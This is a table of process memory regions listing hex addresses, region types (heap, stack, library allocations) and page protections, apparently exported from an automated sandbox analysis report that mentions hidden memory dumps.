page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
793000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
19A98C15000
|
heap
|
page read and write
|
||
|
1B883000
|
heap
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
BF2FCFE000
|
stack
|
page read and write
|
||
|
2010000
|
heap
|
page read and write
|
||
|
19A984A2000
|
heap
|
page read and write
|
||
|
19A98A78000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
239BB9A6000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
31C8000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BBCF0000
|
heap
|
page execute and read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B728000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
2090000
|
heap
|
page read and write
|
||
|
3385000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
12A5000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C9E000
|
stack
|
page read and write
|
||
|
B0A000
|
heap
|
page read and write
|
||
|
7FFD9B9D4000
|
trusted library allocation
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A9870E000
|
heap
|
page read and write
|
||
|
1C70000
|
heap
|
page read and write
|
||
|
19A984C5000
|
heap
|
page read and write
|
||
|
BF3053E000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
1A8EE000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
B08000
|
heap
|
page read and write
|
||
|
19A9A530000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A5000
|
heap
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
2B58000
|
heap
|
page read and write
|
||
|
11DE000
|
stack
|
page read and write
|
||
|
1B95B000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
28EE000
|
stack
|
page read and write
|
||
|
19A98A60000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9BC1C000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B6A8000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
62F000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2ED000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C58000
|
heap
|
page read and write
|
||
|
34E8000
|
heap
|
page read and write
|
||
|
19A9A3D4000
|
heap
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
293E000
|
stack
|
page read and write
|
||
|
42D000
|
unkown
|
page read and write
|
||
|
239BBB70000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
239BBC05000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page readonly
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BD59A000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A9A3C3000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
36D8000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
7FFD9BB73000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
327D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
45FF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98C1A000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2E5F000
|
stack
|
page read and write
|
||
|
2C48000
|
heap
|
page read and write
|
||
|
2F9E000
|
stack
|
page read and write
|
||
|
19A98A57000
|
heap
|
page read and write
|
||
|
462E000
|
stack
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
|
48EF000
|
stack
|
page read and write
|
||
|
27DD000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
239BD564000
|
trusted library allocation
|
page read and write
|
||
|
19A0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B36000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
674000
|
heap
|
page read and write
|
||
|
1670000
|
heap
|
page read and write
|
||
|
7FFD9B993000
|
trusted library allocation
|
page read and write
|
||
|
1B9B1000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3DE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
33BC000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
791000
|
unkown
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
E33000
|
unkown
|
page execute read
|
||
|
19A98A89000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27E4000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
553E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BD4C1000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
63E000
|
stack
|
page read and write
|
||
|
539C000
|
stack
|
page read and write
|
||
|
2AFE000
|
stack
|
page read and write
|
||
|
3195000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239CD4C1000
|
trusted library allocation
|
page read and write
|
||
|
54C0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98A6F000
|
heap
|
page read and write
|
||
|
19A98485000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
282F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
19A98A78000
|
heap
|
page read and write
|
||
|
7FFD9BBAD000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
19A984BB000
|
heap
|
page read and write
|
||
|
19A98A78000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27AE000
|
trusted library allocation
|
page read and write
|
||
|
1B21000
|
unkown
|
page execute read
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B13000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
405000
|
unkown
|
page write copy
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
433000
|
unkown
|
page execute read
|
||
|
60C000
|
heap
|
page read and write
|
||
|
27FD000
|
stack
|
page read and write
|
||
|
1833000
|
unkown
|
page execute read
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
524B000
|
stack
|
page read and write
|
||
|
3850000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
5AAE000
|
stack
|
page read and write
|
||
|
5BAF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B22000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
525F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
5207000
|
heap
|
page read and write
|
||
|
57B000
|
stack
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
||
|
19A984AF000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
4D90000
|
heap
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
239CD4CD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
19A983E0000
|
heap
|
page read and write
|
||
|
B03000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
2A8D000
|
stack
|
page read and write
|
||
|
1BB70000
|
heap
|
page read and write
|
||
|
19A9A3D6000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B12E000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3BFA000
|
heap
|
page read and write
|
||
|
4E9B000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2E3F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A984B9000
|
heap
|
page read and write
|
||
|
19A98C1E000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
4CCF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1ABD000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
1B62E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
30DF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239CD4C6000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B04000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27B0000
|
trusted library allocation
|
page read and write
|
||
|
19A98A6F000
|
heap
|
page read and write
|
||
|
2D2F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C26E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B8C1000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
27B4000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
1CBE000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2030000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1AAA000
|
heap
|
page read and write
|
||
|
19A98483000
|
heap
|
page read and write
|
||
|
19A9A3C4000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
AE8000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
7FF446690000
|
trusted library allocation
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
281F000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
A70000
|
trusted library allocation
|
page read and write
|
||
|
2F08000
|
heap
|
page read and write
|
||
|
BF30B7B000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
E08000
|
unkown
|
page readonly
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
1B6A1000
|
heap
|
page read and write
|
||
|
B0E000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
69B000
|
heap
|
page read and write
|
||
|
19A984CE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
676000
|
stack
|
page read and write
|
||
|
12568000
|
trusted library allocation
|
page read and write
|
||
|
1B8DA000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B6B7000
|
heap
|
page read and write
|
||
|
1B82D000
|
stack
|
page read and write
|
||
|
2EBF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
296D000
|
stack
|
page read and write
|
||
|
7FFD9BB7B000
|
trusted library allocation
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
272000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BBA0B000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1E00000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2B0D000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2D7F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
28B2000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B6FA000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
33D2000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page execute read
|
||
|
2D3D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
19A9A3CE000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
19A98400000
|
trusted library allocation
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
7FFD9BB53000
|
trusted library allocation
|
page read and write
|
||
|
61D000
|
stack
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
29A8000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BBA11000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B0B000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
520E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2DCD000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
30E8000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2550000
|
heap
|
page execute and read and write
|
||
|
27AD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
19A98400000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
55FE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B11000
|
heap
|
page read and write
|
||
|
731000
|
unkown
|
page execute read
|
||
|
33BD000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98C13000
|
heap
|
page read and write
|
||
|
A9D000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
27E8000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
2C6D000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2913000
|
trusted library allocation
|
page read and write
|
||
|
BF3043E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2FE8000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A984C1000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C19000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B89D000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A984B6000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3078000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
AE8000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4E9A000
|
heap
|
page read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
19A9A3D4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
19A9A3C0000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
537F000
|
stack
|
page read and write
|
||
|
B25000
|
heap
|
page read and write
|
||
|
3BF0000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
1C16D000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
BF30839000
|
stack
|
page read and write
|
||
|
19A98467000
|
heap
|
page read and write
|
||
|
A90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2A68000
|
heap
|
page read and write
|
||
|
42D000
|
unkown
|
page read and write
|
||
|
1AF2F000
|
stack
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
56FF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
36D000
|
stack
|
page read and write
|
||
|
B29000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2D4F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
274A000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27DC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FDF000
|
stack
|
page read and write
|
||
|
55CB000
|
stack
|
page read and write
|
||
|
1B97F000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2CA7000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
32D000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98A50000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
4BFE000
|
stack
|
page read and write
|
||
|
4DEF000
|
stack
|
page read and write
|
||
|
40DF000
|
heap
|
page read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
D3A000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2ED8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1BB90000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BD535000
|
trusted library allocation
|
page read and write
|
||
|
1B696000
|
heap
|
page read and write
|
||
|
1DED000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
303F000
|
stack
|
page read and write
|
||
|
4B6C000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
3946000
|
heap
|
page read and write
|
||
|
738C2FF000
|
stack
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
32D000
|
stack
|
page read and write
|
||
|
2856000
|
trusted library allocation
|
page read and write
|
||
|
28ED000
|
stack
|
page read and write
|
||
|
792000
|
unkown
|
page write copy
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
297F000
|
stack
|
page read and write
|
||
|
239BBC0A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3388000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
245E000
|
stack
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
404000
|
unkown
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1A590000
|
trusted library allocation
|
page read and write
|
||
|
AE4000
|
heap
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
There are 1989 hidden memdumps, click here to show them.